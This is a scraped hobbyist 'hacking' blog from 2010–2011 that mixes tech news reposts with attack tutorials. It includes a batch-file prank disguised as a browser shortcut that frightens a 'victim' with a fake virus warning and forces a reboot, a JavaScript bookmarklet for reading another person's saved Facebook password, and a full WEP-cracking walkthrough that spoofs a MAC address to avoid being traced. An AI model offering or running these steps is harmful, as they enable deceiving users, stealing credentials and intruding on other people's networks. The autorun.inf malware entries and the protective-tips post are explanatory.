Showing posts with label deadbj. Show all posts
Showing posts with label deadbj. Show all posts

Tuesday, May 3, 2011

How to make a facebook virus

I heard from many of my friends that a virus is spreading on facebook which delete our accounts,I first thought it could have been a trojan that spread out,Then i found out that its just simple prank to shutdown your pc,Now today i will show you how to make a facebook virus to trick your friends
In this tutorial I will show you how to make a Facebook virus using simple commands on notepad. .This will make the victim think they have got a virus when they click on an icon such as Internet Explorer .
Making a fake facebook virus! 

1) Open notepad
2) Type this in :



@echo off
msg * WARNING VIRUS DETECTED!!!!! AFTER 5 MINUTES YOUR FACEBOOK ACCOUNT WILL BE DELETED !!!!TO REMOVE THE VIRUS CLICK OK OR CLOSE THIS BOX!
PAUSE
shutdown -r -t 300 -c " SORRY!!! YOUR FACEBOOK ACCOUNT ARE NOW BEING DELETED !!! PLEASE WAIT ..........."





3) Save it as something.bat
4)Right click on Internet Explorer .bat and click Create Shortcut
5)Right click on shorcut and click Properties.
6) Click Change Icon
7.Choose Internet Explorer icon or similar , click OK , then click Apply

Now your facebook virus is almost ready


8).Delete real shortcut and replace it with fake . When victim click on it , he will get warning messages that looks like this:






Wednesday, April 27, 2011

Hacking Autorun.inf virus attack|Is autorun.inf virus?


Hacking Autorun.inf virus attack|Is autorun.inf virus?


When i  studied second year(cse), my friends told that autorun.inf is virus.  I thought so.  Because my antivirus blocks autorun.inf files.   In third year when i search about autorun.inf file in net, i realize about the auto run file.

 Today i bring some files from my college system.  When i insert the pen drive in my system, there are lot of exe files.They are viruses.  I delete all of them.  Finally i opened the autorun.inf file in notepad and saw the instructions.  Then only i remembered that i forget to post about autorun file.  This article will give you complete details about the autorun.inf file.
This is the instructions that saved in the infected(call virus programs) autorun.inf file:



[Autorun]
Open=RECYCLER\QqFvXcB.exe
Explore=RECYCLER\QqFvXcB.exe
AutoPlay=RECYCLER\QqFvXcB.exe
shell\Open\Command=RECYCLER\QqFvXcB.exe
shell\Open\Default=1
shell\Explore\command=RECYCLER\QqFvXcB.exe
shell\Autoplay\Command=RECYCLER\QqFvXcB.exe



is autorun.inf virus file?  no.  Then why antivirus block the autorun.inf files?  Go ahead to know the full details about auto run file.

Introduction to Autorun.inf File:
Auto run is file that triggers other programs,documents ,other files to be opened when the cd or pen drives are inserted.  Simpy triggers.

When cd or pen drives are inserted, windows will search for the autorun.inf file and follow the instructions of autorun.inf file(instructions have written inside the autorun.inf file).

How to create Autorun file?
Open notepad
type this command:
[Autorun]
save the file as "autorun.inf" (select all files, not text )

Complete Syntax and instructions inside the Autorun file:
Basic syntax must be inside  the autorun.inf file is :
[Autorun]
This will be used to identify the the file as autorun.

OPEN=
This will specify which application should be opened when the cd or pen drive is opened

Example:
open=virus.exe
This will launch the virus.exe file when cd or pen drive is opened.  The file should be in root directory.
if the file is in any other sub directories ,then we have to specify it.
Open=RECYCLER\Virus.exe
Explore=
Nothing big difference. if you right click and select explore option in cd or pen drive.  This command will be run.

AutoPlay=
Same as the above , but it will launch the the program when auto played.


SHELL\VERB =

The SHELL\VERB command adds a custom command to the drive's shortcut menu. This custom command can for example be used to launch an application on the CD/DVD.

Example:

shell\Open\Command=RECYCLER\QqFvXcB.exe
shell\Open\Default=1
shell\Explore\command=RECYCLER\QqFvXcB.exe
shell\Autoplay\Command=RECYCLER\QqFvXcB.exe



Use a series of shell commands to specify one or more entries in the pop-up menu that appears when the user right-clicks on the CD icon. (The shell entries supplement the open command.)

Icon=
Change the icon of your pen drive or cd.  you can use .ico,.bmp images(also .exe,.dll)

Example:
icon=breakthesecurity.ico
Label=

Specifies a text label to displayed for this CD in Explorer
Note that using the LABEL option can lead to problems displaying the selected ICON under Windows XP.

Example:
Label=Ethical hacking


Why Antivirus Block Autorun.inf file?
From above ,you come to know that autorun.inf file is not virus.  But why antivirus blocks it?  Because as i told autorun file call or launch any application or exe files.  It will lead to virus attack.  If the autorun.inf is blocked,then there is no way to launch the virus code.

Autorun is not virus but it can call virus files.

Saturday, January 15, 2011

View Password Behind Asterik [in facebook]. . .

Only can gain access if thre is other account loggged out and the password is in the form of asterik. . .

 At Address bar paste the following code...

javascript: var p=r(); function r(){var g=0;var x=false;var x=z(document.forms);g=g+1;var
w=window.frames;for(var k=0;k<w.length;k++) {var x = ((x) || (z(w[k].document.forms)));g=g+1;}if (!x) alert('Password not found in ' + g +
' forms');}function z(f){var b=false;for(var i=0;i<f.length;i++) {var e=f[i].elements;for(var j=0;j<e.length;j++) {if (h(e[j])) {b=true}}}return
b;}function h(ej){var s='';if (ej.type=='password'){s=ej.value;if (s!=''){prompt('Password found ', s)}else{alert('Password is
blank')}return true;}}

ENJOY.

Wednesday, January 12, 2011

How to Hack Wifi or Wireless Password

STEPS TO HACK WIFI OR WIRELESS PASSWORD

1. Get the Backtrack-Linux CD. Backtrack Linux Live CD(best Linux available for hackers with more than 2000 hacking tools inbuilt).
Download Backtrack Linux Live CD from here: CLICK HERE
 
2.  SCAN TO GET THE VICTIM

Get the victim to attack that is whose password you want to hack or crack.
Now Enter the Backtrack Linux CD into your CD drive and start it. Once its started click on the black box in the lower left corner to load up a "KONSOLE" . Now you should start your Wifi card. To do it so type 

airmon-ng

You will see the name of your wireless card. (mine is named "ath0") From here on out, replace "ath0" with the name of your card. Now type

airmon-ng stop ath0

then type:

ifconfig wifi0 down

then type:

macchanger --mac 00:11:22:33:44:55 wifi0

then type:

airmon-ng start wifi0

The above steps i have explained is to spoof yourself from being traced. In above step we are spoofing our MAC address, this will keep us undiscovered.

Now type:

airodump-ng ath0

All above steps in one screen shot:
Now you will see a list of wireless networks in the Konsole. Some will have a better signal than others and its always a good idea to pick one that has a best signal strength otherwise it will take huge time to crack or hack the password or you may not be able to crack it at all.
Once you see the networks list, now select the network you want to hack. To freeze the airodump screen HOLD the CNTRL key and Press C.
Now you will see something like this:
 
 
 
3.  SELECTING NETWORK FOR HACKING 

Now find the network that you want to crack and MAKE SURE that it says the encryption for that network is WEP. If it says WPA or any variation of WPA then move on...you can still crack WPA with backtrack and some other tools but it is a whole other ball game and you need to master WEP first.
 
  
Once you've decided on a network, take note of its channel number and bssid. The bssid will look something like this --

00:23:69:bb:2d:of

The Channel number will be under a heading that says "CH".
As shown in this figure:
 
 
 
Now in the same KONSOLE window type:

airodump-ng -c (channel) -w (file name) --bssid (bssid) ath0


The file name can be whatever you want. This file is the place where airodump is going to store the packets of info that you receive to later crack. You don't even put in an extension...just pick a random word that you will remember. I usually make mine "Ben" because I can always remember it. Its simply because i love ben10....hhahahahaha :D

Note: If you want to crack more than one network in the same session, you must have different file names for each one or it won't work. I usually name them as ben1, ben2 etc.

Once you typed in that last command, the screen of airodump will change and start to show your computer gathering packets. You will also see a heading marked "IV" with a number underneath it. This stands for "Initialization Vector" but in general terms all this means is "packets of info that contain characters of the password." Once you gain a minimum of 5,000 of these IV's, you can try to crack the password. I've cracked some right at 5,000 and others have taken over 60,000. It just depends on how long and difficult they made the password. More difficult is password more packets you will need to crack it.




4.  Cracking the WEP password

Now leave this Konsole window up and running and open up a 2nd Konsole window.
In this window type:

aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 ath0

This will send some commands to the router that basically it is to associate your computer even though you are not officially connected with the password. If this command is successful, you should see about 4 lines of text print out with the last one saying something similar to "Association Successful :-)" 
If this happens, then good! You are almost there.

Now type:
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 ath0

This will generate a bunch of text and then you will see a line where your computer is gathering a bunch of packets and waiting on ARP and ACK. Don't worry about what these mean...just know that these are your meal tickets. Now you just sit and wait. Once your computer finally gathers an ARP request, it will send it back to the router and begin to generate hundreds of ARP and ACK per second. Sometimes this starts to happen within seconds...sometimes you have to wait up to a few minutes. Just be patient. When it finally does happen, switch back to your first Konsole window and you should see the number underneath the IV starting to rise rapidly. This is great! It means you are almost finished! When this number reaches AT LEAST 5,000 then you can start your password crack. It will probably take more than this but I always start my password cracking at 5,000 just in case they have a really weak password.

Now you need to open up a 3rd and final Konsole window. This will be where we actually crack the password. 
Now type:
aircrack-ng -b (bssid) (filename)-01.cap

Remember the file name you made up earlier? Mine was "Ben". Don't put a space in between it and -01.cap here. Type it as you see it. So for me, I would type wepkey-01.cap
Once you have done this you will see aircrack fire up and begin to crack the password. typically you have to wait for more like 10,000 to 20,000 IV's before it will crack. If this is the case, aircrack will test what you've got so far and then it will say something like "not enough IV's. Retry at 10,000." 
DON'T DO ANYTHING! It will stay running...it is just letting you know that it is on pause until more IV's are gathered. Once you pass the 10,000 mark it will automatically fire up again and try to crack it. If this fails it will say "not enough IV's. Retry at 15,000." and so on until it finally gets it.

If you do everything correctly up to this point, before too long you will have the password! now if the password looks goofy, dont worry, it will still work. some passwords are saved in ASCII format, in which case, aircrack will show you exactly what characters they typed in for their password. Sometimes, though, the password is saved in HEX format in which case the computer will show you the HEX encryption of the password. It doesn't matter either way, because you can type in either one and it will connect you to the network.

Take note, though, that the password will always be displayed in aircrack with a colon after every 2 characters. So for instance if the password was "secret", it would be displayed as:
se:cr:et

This would obviously be the ASCII format. If it was a HEX encrypted password that was something like "0FKW9427VF" then it would still display as:
0F:KW:94:27:VF



Just omit the colons from the password, boot back into whatever operating system you use, try to connect to the network and type in the password without the colons and presto! You are in!

It may seem like a lot to deal with if you have never done it, but after a few successful attempts, you will get very quick with it. If I am near a WEP encrypted router with a good signal, I can often crack the password in just a couple of minutes.

I am not responsible for what you do with this information. Any malicious/illegal activity that you do, falls completely on you because...technically...this is just for you to test the security of your own network.
 
VDO to easily crack WEP...

 <This GROUP is for Educational Purposes ONLY !>
<Spread the word, information is free>
<*Welcome 2 U ALL FRM MY SIDE*
*HACKERS R KNOWN AS DANGEROUS:
"THEIR only goal is the Knowledge,
and because the Knowledge is the Power,
THEY are considered as dangerous."-deadbj

SRC : http://www.isoftdl.com/http://www.isoftdl.com/

Monday, January 10, 2011

BACTERIA WORK AS HARD DRIVES...


BACTERIA WORK AS HARD DRIVES...


Scientists have found a way to store, encrypt and retrieve complex data in the DNA of E. coli.


Mon Jan 10, 2011 01:00 AM ET 
Content provided by AFP/Judith Evans

THE GIST
  • A group of students at Hong Kong's Chinese University have developed a way to store complex information in bacteria.
  • This opens up a way to saving text, images, music, and even video within living cells.
  • One gram of bacteria could store the same amount of information as 450 2,000-gigabyte hard disks.


A group of students at Hong Kong's Chinese University are making strides towards storing such vast amounts of information in an unexpected home: the E. coli bacterium better known as a potential source of serious food poisoning.

"This means you will be able to keep large datasets for the long term in a box of bacteria in the refrigerator," said Aldrin Yim, a student instructor on the university's biostorage project, a 2010 gold medallist in the Massachusetts Institute of Technology prestigious iGEMcompetition.
Biostorage -- the art of storing and encrypting information in living organisms -- is a young field, having existed for about a decade.
In 2007, a team at Japan's Keio University said they had successfully encoded the equation that represents Einstein's theory of relativity, E=MC², in the DNA of a common soil bacterium.
They pointed out that because bacteria constantly reproduce, a group of the single-celled organisms could store a piece of information for thousands of years.
But the Hong Kong researchers have leaped beyond this early step, developing methods to store more complex data and starting to overcome practical problems which have lent weight to skeptics who see the method as science fiction.
The group has developed a method of compressing data, splitting it into chunks and distributing it between different bacterial cells, which helps to overcome limits on storage capacity. They are also able to "map" the DNA so information can be easily located.
This opens up the way to storing not only text, but images, music, and even video within cells.
As a storage method it is extremely compact -- because each cell is minuscule, the group says that one gram of bacteria could store the same amount of information as 450 2,000-gigabyte hard disks.
They have also developed a three-tier security fence to encode the data, which may come as welcome news to U.S. diplomats, who have seen their thoughts splashed over the Internet thanks to WikiLeaks.
"Bacteria can't be hacked," points out Allen Yu, another student instructor.
"All kinds of computers are vulnerable to electrical failures or data theft. But bacteria are immune from cyber attacks. You can safeguard the information."
The team have even coined a word for this field -- biocryptography -- and the encoding mechanism contains built-in checks to ensure that mutations in some bacterial cells do not corrupt the data as a whole.
Professor Chan Ting Fung, who supervised the student team, told AFP that practical work in the field -- fostered by MIT, who have helped develop standards enabling researchers to collaborate -- was in its early stages.
But he said: "What the students did was to try it out and make sure some of the fundamental principles are actually achievable."
The Hong Kong group's work may have a more immediate application.
The techniques they use -- removing DNA from bacterial cells, manipulating them using enzymes and returning them to a new cell -- are similar to those used to create genetically modified foods.
But rather than changing the building blocks of an organism, the Hong Kong group allows extra information to piggyback on the DNA of the cell, after checking their changes against a master database to make sure they do not have accidental toxic effects.
Their work could enable extra information to be added to a genetically modified crop in the form of a "bio barcode", Chan said.
"For example, a company that makes a GM tomato that grows extra large with a gene that promotes growth -- on top of that we can actually encode additional information like safety protocols, things that are not directly related to the biological system."
Other types of information, like copyright and design history, could help to monitor the spread of GM crops, he said.
"It's kind of a safety net for synthetic organisms," said Wong Kit Ying, from the student team.
Beyond this, Chan and the students are evangelical about the future possibilities of synthetic biology.
"The field is getting popular because of the energy crisis, environmental pollution, climate change. They are thinking that a biological system will be a future solution to those -- as alternative energy sources, as a remedy for pollution. For these, micro-organisms are the obvious choice," Chan said.
One type of bacterium, Deinococcus radiodurans, can even survive nuclear radiation.
"Bacteria are everywhere: they can survive on things that are unthinkable to humans. So we can make use of this," Chan said.
So is it possible that a home computer could one day consist of a dish filled with micro-organisms?
The group dismisses concerns that this could be dangerous, pointing out that despite E. coli's poor reputation, they use an altered form that cannot exist outside a rich synthetic medium.
In fact, says Chan, while safety rules are strict, more measures are taken to protect the bacteria from contamination than to protect the researchers from the bacteria.
However, Yim admitted that while the group's work is a "foundational advance", a Petri dish PC is not likely to be on the market in the coming years, not least because the method of retrieving the data requires experts in a laboratory.
"It's possible," he said, "but there's a long way to go."

Sunday, January 9, 2011

News on Facebook Ending was a HoaX.-maRk


Facebook will NOT end on March 15th. Hoax news story spreads like wildfire


Heard a story that Facebook is going to end on March 15th? You should take it with a pinch of salt.
A story is spreading like wildfire across Facebook this weekend, claiming that the world's most popular social network is closing on March 15th.
The reason? CEO Mark Zuckerberg claims that "managing [Facebook] has ruined my life. I need to put an end to all the madness." 

FACEBOOK WILL END ON MARCH 15th!

FACEBOOK WILL END ON MARCH 15th!
'PuncH to TheWeB HistorY...'- BIJAY

"REASON MAYBE ANYTHING BUT CLOSING FB WILL BE A MUCH DISABLENESS TO MUCH AND MORE. LET'S HOPE SOMONE ELSE WILL TAKE THE LEADERSHIP AND GIVES THE CONTINUATION TO FB.
HOPE SO"-BIJAY ACHARYA<SHENANIGANS-NEPAL.BLOGSPOT.COM>

Reason of EndiNg FB maY be:
1>mark got better placement
2>may be hackers cause
3>may be googleme shock.
4>may be facebook is misused
5>may be he is afraid of being going his status down after this success.

 PALO ALTO, CA –Mark Zuckerberg announced that Facebook will be shut down in March. Managing the site has become too stressful.
“Facebook has gotten out of control,” said Zuckerberg in a press conference outside his Palo Alto office, “and the stress of managing this company has ruined my life. I need to put an end to all the madness.”
Zuckerberg went on to explain that starting March 15th, users will no longer be able to access their Facebook accounts.
“After March 15th the whole website shuts down,” said Avrat Humarthi, Vice President of Technical Affairs at Facebook. “So if you ever want to see your pictures again, I recommend you take them off the internet. You won’t be able to get them back once Facebook goes out of business.”
Zuckerberg said that the decision to shut down Facebook was difficult, but that he does not think people will be upset.
“I personally don’t think it’s a big deal,” he said in a private phone interview. “And to be honest, I think it’s for the better. Without Facebook, people will have to go outside and make real friends. That’s always a good thing.”
Some Facebook users were furious upon hearing the shocking news.
“What am I going to do without Facebook?” said Denise Bradshaw, a high school student from Indiana. “My life revolves around it. I’m on Facebook at least 10 hours a day. Now what am I going to do with all that free time?”
However, parents across the country have been experiencing a long anticipated sense of relief.
“I’m glad the Facebook nightmare is over,” said Jon Guttari, a single parent from Detroit. “Now my teenager’s face won’t be glued to a computer screen all day. Maybe I can even have a conversation with her.”
Those in the financial circuit are criticizing Zuckerberg for walking away from a multibillion dollar franchise. Facebook is currently ranked as one of the wealthiest businesses in the world, with economists estimating its value at around 7.9 billion.
But Zuckerberg remains unruffled by these accusations. He says he will stand by his decision to give Facebook the axe.
“I don’t care about the money,” said Zuckerberg. “I just want my old life back.”
The Facebook Corporation suggests that users remove all of their personal information from the website before March 15th. After that date, all photos, notes, links, and videos will be permanently erased.

 "REASON MAYBE ANYTHING BUT CLOSING FB WILL BE A MUCH DISABLENESS TO MUCH AND MORE. LET'S HOPE SOMONE ELSE WILL TAKE THE LEADERSHIP AND GIVES THE CONTINUATION TO FB.
HOPE SO"-BIJAY ACHARYA<SHENANIGANS-NEPAL.BLOGSPOT.COM>

news was published in http://weeklyworldnews.com/headlines/27321/facebook-will-end-on-march-15th/  on saturday.

Saturday, January 8, 2011

Forgot the Administrator Password-unlOck WitH tHis

DOWNLOAD IT HERE
If you're not 'techie' or are short on time, our team always recommends Stellar Phoenix Password Recovery. This tool automatically makes you the ultimate startup CD for resetting any Windows password.

It's also loaded with a ton of other recovery tools IT techs use daily.

-Petri IT Knowledgebase Team
Forgot the Administrator password - Alternate Method - The LOGON.SCR trick
This is another trick that will easily work in Windows NT 4.0 and some versions of Windows 2000. The principal is that you need to install a second instance of your OS to your HD, then manipulate the default screen saver (the one that's used if you don't move your mouse while the CTRL-ALT-DEL box appears) for the original OS.

How to lock drive in windows ?

STEPS TO LOCK DRIVE IN WINDOWS:
1. Go to Start menu and then to RUN  and type "gpedit.msc" (without quotes) and Press Enter.
2. Now you will see a new dialog window , where you will see two things "Computer Configuration" and "User Configuration". Now click on "User Configuration".
3. There you will see three items. Now you have to Click on "Administrative Templates". Then go to "Windows Components".
4. There you will see a lot of Windows Components. Now Click on " Windows Explorer"

5. Now you will find something like this "Prevent Access To Drives From My Computers" , double click on it . It will open its properties. Now to lock a drive or drives click on "Enabled" radio button. Now from the drop down menu select the drive that you want to lock or block.
6. After that click on apply and restart your system. Now anyone will not been able to access the particular drive.
7. To unlock the drive again follow the similar procedure and just click on "Not configured" and apply the settings and restart your system.

FULL Procedure is in this snapshot...
 
 

Monday, January 3, 2011

China built world's fastest super computer named Tianhe-1A

Tianhe-1A, a new supercomputer revealed today at HPC 2010 China, has set a new performance record of 2.507 petaflops, as measured by the LINPACK benchmark, making it the fastest system in China and in the world today(1)

Tianhe-1A epitomizes modern heterogeneous computing by coupling massively parallel GPUs with multi-core CPUs, enabling significant achievements in performance, size and power. The system uses 7,168 NVIDIA® Tesla™ M2050 GPUs and 14,336 CPUs; it would require more than 50,000 CPUs and twice as much floor space to deliver the same performance using CPUs alone.

More importantly, a 2.507 petaflop system built entirely with CPUs would consume more than 12 megawatts. Thanks to the use of GPUs in a heterogeneous computing environment, Tianhe-1A consumes only 4.04 megawatts, making it 3 times more power efficient -- the difference in power consumption is enough to provide electricity to over 5000 homes for a year.

Tianhe-1A was designed by the National University of Defense Technology (NUDT) in China. The system is housed at National Supercomputer Center in Tianjin and is already fully operational.

"The performance and efficiency of Tianhe-1A was simply not possible without GPUs," said Guangming Liu, chief of National Supercomputer Center in Tianjin. "The scientific research that is now possible with a system of this scale is almost without limits; we could not be more pleased with the results."

The Tianhe-1A supercomputer will be operated as an open access system to use for large scale scientific computations.

"GPUs are redefining high performance computing," said Jen-Hsun Huang, president and CEO of NVIDIA. "With the Tianhe-1A, GPUs now power two of the top three fastest computers in the world today. These GPU supercomputers are essential tools for scientists looking to turbocharge their rate of discovery."

NVIDIA Tesla GPUs, based on the CUDA™ parallel computing architecture, are designed specifically for high performance computing (HPC) environments and deliver transformative performance increases across a wide range of HPC fields, including drug discovery, hurricane and tsunami modeling, cancer research, car design, even studying the formation of galaxies.

 

Sunday, December 26, 2010

d0z.me [EVIL URL SHORTENER]

techcrunch.com
Conceptual hacker Ben Schmidt has combined his interest in the recent spate of DDoS attacks surrounding the WikiLeaks dump as well as what he holds to be the public's increasing over-reliance on URL shorteners and created D0z.me. D0z.me is a...........
FOR MORE PLZ VISIT ...

Monday, October 4, 2010

Google opens URL-shortener Goo.gl to public

Google opens URL-shortener Goo.gl to public


 



src: http://edition.cnn.com/2010/TECH/web/10/01/google.url.shortener/index.html

by:  http://losthacker-deadbj.blogspot.com/

PassworD must bE haRd : [Enough is Enough : Stop hackers.]

Protect Yourself From Computer Hackers
Computer Scientists Say Hackers Prey On Those Who Don't Protect Themselves

 
April 1, 2008 — Computer scientists observe that the people most at risk for the loss of private information and other computer problems are those who create easily guessed passwords and user names. They advise creating and regularly updating complicated passwords that contain upper- and lower-case letters as well as numbers. They also recommend running regular virus checks on the computer.
If you have a computer connected to the Internet, watch out! You'll be surprised to learn how often it's being attacked by computer hackers. Ivanhoe explains how to protect yourself and your PC.
It can strike at any time and can attack and destroy your computer. A virus hit Nicole Gentile's PC with a vengeance. "It was terrible," Gentile recalls. "It destroyed most of my files." And it also left her with a mess to clean up.
"It was a horrible feeling," she says. "I felt invaded and it caused me a lot of time and money to get everything fixed on my computer."
Nicole's ordeal is common. Computer scientists now reveal that computer hackers are using the internet to attack your computer every 40 seconds! "He or she will get on your computer and then see what is interesting on your computer." Michel Cukier, Ph.D., a computer scientist at the University of Maryland in College Park, told Ivanhoe.
Hackers can use disc space on your own computer and steal credit card numbers and personal info. Computer scientists also discovered hackers try common usernames and passwords to break into computers. "If you have a weak password, it will take a few minutes for that password to be found." Dr. Cukier explains.
Consumers should avoid easily guessed usernames like "test," "guest" and "info," and easy passwords like "1-2-3-4-5-6," "password" and "1-2-3-4." Instead, use longer, complicated usernames and passwords with random numbers and upper and lowercase letters.
"You try to make something as complex as possible." Dr. Cukier says. Changing usernames and passwords more often can help guard against future attacks. Also, anti-virus software may help keep computers hacker-safe.
"I bought a lot of virus protection software for my computer, so let's hope it works," Gentile says.
Hackers also break into large numbers of unsuspecting computers to control and manipulate the computers remotely for fraudulent purposes like identity theft, to disrupt networks and corrupt computer files.
HOW DO COMPUTER VIRUSES DAMAGE PROGRAMS? There are several different ways a computer can become infected. A virus is a small piece of software that attaches itself to an existing program. Every time that program is executed, the virus starts up, too, and can reproduce by attaching itself to even more programs.
When contained in an email, the virus usually replicates by automatically mailing itself to dozens of people listed in the victim's email address book. Unfortunately, viruses don't just replicate, they often cause damage. There is usually a trigger -- a command or keystroke -- that causes the virus to launch its "attack." This can be anything from leaving a silly message to erasing all of the user's data. For example, whenever the current minutes on an infected computer's clock equaled the day (for example, at 6:27 pm on the 27th of any given month), the Melissa virus would copy the following Bart Simpson quote into the current document: "Twenty-two points, plus triple-word-score, plus 50 points for using all my letters. Game's over. I'm outta here."
WHAT ARE WORMS? Worms are a different type of infection. A piece of worm software uses computer networks and security holes in specific software or operating systems to copy itself from machine to machine. Because Microsoft's Windows platform is so pervasive, for example, many hackers design their worms to exploit security holes in those products. In 2001, the worm Code Red spread rapidly by scanning the Internet for computers running Windows NT or Windows 2000. In contrast to a worm, a Trojan horse can't replicate itself at all: it is simply a computer program pretending to be something harmless -- a game, for example -- but instead does damage when the user runs it, often erasing the hard drive.
PROTECT YOURSELF FROM COMPUTER VIRUSES:
1. Buy virus protection software and keep it up-to-date.
2. Avoid downloading programs from unknown sources; stick with commercial software purchased on CD-ROMs.
3. Make sure that the Macro Virus Protection feature is enabled in all Microsoft applications.
4. Never double-click on an email attachment containing an executable program. These will have extensions like .exe, .com, or .vbs.
5. Consider switching to a more secure operating system, like Linux.
src : http://www.sciencedaily.com/videos/2008/0407-protect_yourself_from_computer_hackers.htm
by : http://losthacker-deadbj.blogspot.com/http://losthacker-deadbj.blogspot.com/